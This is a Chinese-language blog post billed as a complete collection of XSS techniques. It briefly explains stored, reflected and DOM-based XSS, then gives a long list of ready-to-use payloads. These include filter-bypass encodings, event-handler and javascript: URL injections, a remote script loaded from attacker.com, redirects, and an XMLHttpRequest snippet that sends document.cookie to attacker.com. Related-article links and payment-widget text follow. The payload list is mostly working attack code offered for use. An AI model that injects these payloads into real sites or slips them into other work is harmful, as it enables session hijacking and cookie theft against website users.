xss跨站脚本攻击姿势大全

最新推荐文章于 2025-03-31 23:59:21 发布
最新推荐文章于 2025-03-31 23:59:21 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: 网络安全 文章标签: xss 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_56438857/article/details/130857868
版权

XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的网络安全漏洞,攻击者通过在受信任的网站上注入恶意脚本代码,然后使用户在浏览器中执行这些恶意代码,从而实现攻击目的。XSS 攻击通常发生在使用不安全的输入验证和输出编码的 Web 应用程序上。

XSS 攻击可分为三种主要类型

存储型 XSS(Stored XSS):攻击者将恶意脚本代码存储到目标网站的服务器上,然后当其他用户访问包含恶意代码的页面时,恶意代码会被执行。这种攻击常见于用户留言板、论坛、博客等需要持久存储用户输入的网站。例如,攻击者在一个论坛的评论中插入恶意脚本,当其他用户查看该评论时,恶意脚本会在他们的浏览器中执行。

反射型 XSS(Reflected XSS):攻击者构造包含恶意脚本的链接,并诱使用户点击该链接。当用户点击链接后,恶意脚本会被发送到目标网站的服务器上,并在服务器的响应中返回给用户的浏览器,进而被执行。这种攻击常见于通过 URL 参数传递用户输入的场景。例如,攻击者构造一个恶意链接,其中包含恶意脚本,当用户点击该链接时,恶意脚本会在他们的浏览器中执行。

DOM 型 XSS(DOM-based XSS):这种类型的 XSS 攻击不涉及向服务器发送恶意脚本,而是利用 JavaScript 在客户端修改页面的 DOM 结构,从而执行恶意操作。攻击利用了客户端代码对 URL 参数或其他用户可控数据的直接操作。例如,一个网站使用 JavaScript 获取 URL 参数并直接插入到页面中,如果没有进行适当的过滤和编码,攻击者可以通过构造恶意 URL 参数来执行恶意操作。

下面是各种不同类型的payload
基本的 

<script>alert('XSS')</script>

使用 HTML 注释绕过:

<!--><script>alert('XSS')</script>-->

使用 JavaScript 事件处理程序:

<img src="x" onerror="alert('XSS')">

使用 JavaScript URL 伪协议:

<a href="javascript:alert('XSS')">Click Me</a>

使用 javascript: URL 伪协议:

<a href="javascript:alert('XSS')">Click Me</a>

使用内联 JavaScript 代码:

<a href="javascript:void(0)" onclick="alert('XSS')">Click Me</a>

使用 HTML 实体编码:

<script>alert(&#x27;XSS&#x27;)</script>

利用 img 标签的 onerror 事件:

<img src="invalid" onerror="alert('XSS')">

使用 SVG 图像:

<svg/onload=alert('XSS')>

利用 CSS 表达式:

<div style="background-image: expression(alert('XSS'));">

使用特殊字符编码绕过过滤:

<script>alert(String.fromCharCode(88,83,83))</script>

利用 document.write():

<script>document.write('XSS')</script>

使用 eval() 函数执行恶意代码:

<script>eval('alert("XSS")')</script>

利用 URL 编码绕过过滤:

<script>alert(/XSS/)</script>

使用 JavaScript 注释绕过过滤:

<script>//alert('XSS')</script>

利用 iframe 进行攻击:

<iframe src="javascript:alert('XSS')"></iframe>

使用远程脚本文件:

<script src="http://attacker.com/malicious.js"></script>

利用 标签的 onload 事件:

<img src="valid" onload="alert('XSS')">

利用 或 标签:

<audio src="javascript:alert('XSS')"></audio>
<video src="javascript:alert('XSS')"></video>

利用 JSONP:

<script src="http://attacker.com/endpoint?callback=alert"></script>

使用 标签:

<marquee onstart="alert('XSS')">Hover Me</marquee>

使用 标签的 onchange 事件:

<input type="text" onchange="alert('XSS')">

使用 onmouseover 事件:

<div onmouseover="alert('XSS')">Hover Me</div>

利用 window.location 进行重定向:

<script>location.href='http://attacker.com';</script>

利用 document.cookie 获取用户 Cookie 信息:

<script>alert(document.cookie)</script>

使用 localStorage 或 sessionStorage 存储恶意数据:

<script>localStorage.setItem('data', 'malicious')</script>

利用 XMLHttpRequest 发送数据:

<script>
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://attacker.com/?data=' + document.cookie, true);
  xhr.send();
</script>

利用 onload 事件进行重定向:

<script>
window.onload = function() {
  window.location.href = 'http://attacker.com';
};
</script>

利用 onsubmit 事件修改表单数据:

<form action="/" onsubmit="document.getElementById('password').value = 'malicious'">
  <input type="password" id="password">
  <input type="submit" value="Submit">
</form>

利用 标签的 onkeyup 事件:

<input type="text" onkeyup="alert('XSS')">

利用 标签的 javascript: URL:

<a href="javascript:window.location='http://attacker.com'">Click Me</a>

利用 标签:

<textarea autofocus onfocus="alert('XSS')">Hover Me</textarea>

利用特殊标签属性:

<div id="xss" data-attr="javascript:alert('XSS')"></div>
<script>document.getElementById('xss').dataset.attr</script>

利用 innerHTML 修改页面内容:

<script>document.body.innerHTML = 'XSS'</script>

利用 setTimeout() 函数执行恶意操作:

<script>
setTimeout(function() {
  alert('XSS');
}, 1000);
</script>

利用 或 标签:

<object data="javascript:alert('XSS')"></object>
<embed src="javascript:alert('XSS')"></embed>

利用 Flash 对象:

<embed src="xss.swf">

使用 HTML5 的 postMessage() 方法:

<script>
window.postMessage('malicious', '*');
</script>

利用 CSS 中的 url() 函数执行恶意操作:

<style>
div {
  background-image: url(javascript:alert('XSS'));
}
</style>
<div></div>

利用 onhashchange 事件:

<script>
window.onhashchange = function() {
  alert('XSS');
};
</script>
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
杨秀璋的专栏
10-12 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,并构建了Web目录扫描器;本文将详细讲解XSS跨站脚本攻击,从原理、示例、危害到三种常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解,最后分享了如何预防XSS攻击。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的编程经验进行讲解。
XSS(跨站脚本攻击)详解
热门推荐
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 跨站脚本攻击XSS(Cros...
XSS脚本合集
07-16
文档几乎包含所有XSS脚本,有需要的朋友快快下载。文档几乎包含所有XSS脚本,有需要的朋友快快下载。文档几乎包含所有XSS脚本,有需要的朋友快快下载。
Xss多种姿势
浅浅徘徊的博客
03-19 781
xss攻击 字符编码 firefox下某参数为%c1\"alert(/xss/) var username="";alert(/xss/) 绕过长度限制 location.hash http://www.test.com#alert() onclick='eval(location.hash.substr(1)) 注释 多个input把中间注释&gt;&lt;!-...
XSS 攻击(详细)
最新发布
FFNCL的博客
03-31 2047
XSS,即跨站脚本攻击,是 Web 安全领域中十分常见的漏洞类型。攻击者通过在 Web 页面中注入恶意脚本,当用户浏览该页面时,恶意脚本便会在用户的浏览器中执行。借助这种攻击方式,攻击者能够窃取用户的敏感信息,如登录凭证、个人隐私数据等;劫持用户会话,以用户身份进行各种操作;甚至篡改网站内容,严重损害网站的声誉和用户信任。举例来说,某电商网站若存在 XSS 漏洞,攻击者可通过注入恶意脚本,窃取用户的账号密码,进而盗刷用户的账户资金,给用户带来直接的经济损失。
XSS的一些简单姿势
weixin_45053353的博客
05-12 787
XSS的一些简单姿势通过javascript指令实现的图片无引号无分号不区分大小写的xss攻击向量默认SRC属性去绕过SRC域名检测过滤器通过error事件触发alert未完待续,一些自己的小心得,第一次发表,望大大们海涵。 通过javascript指令实现的图片 图片xss依靠javascript指令实现。(IE7.0不支持javascript指令在图片上下文中,但是可以在其他上下文触发。下面的...
【转】XSS的两种攻击方式及五种防御方式
tpriwwq的专栏
11-05 4605
XSS攻击介绍及防御方法
跨站脚本攻击
qq_39249347的博客
07-11 1501
跨站脚本攻击 跨站脚本攻击是一种代码注入攻击,这种攻击通常涉及三个实体:攻击者、被攻击用户和目标网站。 一般而言,攻击者必须找到将自己的恶意代码经由目标网站注入目标浏览器的方法,这类攻击被称为跨站脚本攻击。 攻击者有两种典型的方法通过目标网站将它们的代码注入目标用户的浏览器中:一种称为反射型XSS,另一种称为存储型XSS。 反射型XSS: 许多网站都有反射行为,也就说它们从用户那里接受输入,执行一些操作,然后向用户发送响应网页,用户的输入也被包含在响应网页里。 攻击者可以在输入中混入Javascrip
XSS跨站脚本攻击)多姿势绕过滤思路
ElsonHY的博客
11-17 1361
XXS(跨站脚本攻击)多姿势绕过滤思路0x01 什么是XSS?0x02 XSS的危害0x03 XSS类型0x04 多姿势绕过1.基本的xss2.大小写绕过、字符拼接3.解锁更多姿势4.转义字符的排除0x05 其他情况0x06 总结 0x01 什么是XSS? 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击主要针对的是客户端的攻击。 0x02 XSS的危害 XSS能实现的的攻击有很多,一般攻击水平是取决
pikachu-XSS跨站脚本攻击
a1245678899的博客
11-09 1266
XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容 被当成正常的HTML来执行(类似于SQL注入),从而产生危害。造成DOM型XSS的原因是前端的输入被DOM给获取到了,通过DOM又在前端输出,跟反射型和存储型比起来,它是不经过后台交互的。存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害。编码,后台过滤了特殊字符,比如标签,但该标签可以被各种编码,后台不一定过。
跨站脚本攻击XSS
CoffeMilk的博客
09-15 1114
XSS(全称:Cross Site Scripting【跨站脚本攻击】),为了避免和CSS(全称:Cascading Style Sheets【层叠样式表】)名称混淆冲突,故改名为:XSS;是一种常见的Web应用程序代码注入安全漏洞之一。攻击者可以利用这种漏洞在网站上注入行恶意代码,用户在不知情的情况下访问这些被注入了恶意代码的网站内容,导致用户自己的账户、会话cookie、键盘输入内容等敏感信息被攻击者盗取,攻击者可以利用这些信息突破网站的访问限制并冒充受害用户进行操作。
xss跨站脚本攻击汇总
07-24
xss跨站脚本攻击汇总,可以学习一下啊,比较全面了
XSS学习总结
bcbobo21cn的专栏
06-21 2358
XSS攻击常识及常见的XSS攻击脚本汇总 一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现 了不被预期的脚本指令并执行时,XSS就发生了。 这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。 二、XSS有什么危害? 当我
【Web 安全】XSS的三种姿势及其防范手段
weixin_54787877的博客
03-15 2803
介绍 XSS跨站脚本攻击(Cross Site Scripting)的简写,但是从首写字母命名的方式来看,应该取名 CSS,但这样就和层叠样式(Cascading Style Sheets,CSS)重名了,所以取名为 XSSXSS 攻击,一般是指攻击者通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式。 分类 XSS 攻击按是否把攻击数据存进服务器端,攻击行为是否伴随着攻击数据一直存在,可分为非持久型XSS攻击和持久型XSS攻击。 XSS 攻...
xss攻击的初步了解
weixin_34343689的博客
12-02 156
2019独角兽企业重金招聘Python工程师标准>>> ...
XSS(跨站脚本攻击) - 常用代码大全
qq_28004653的博客
07-06 1981
1’"()&% <svg/οnlοad=alert(1)> '> =’> %3Cscript%3Ealert(‘XSS’)%3C/script%3E %0a%0a.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/wi
安全测试之XSS绕过姿势总结
LYX_WIN
06-15 509
xss test
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值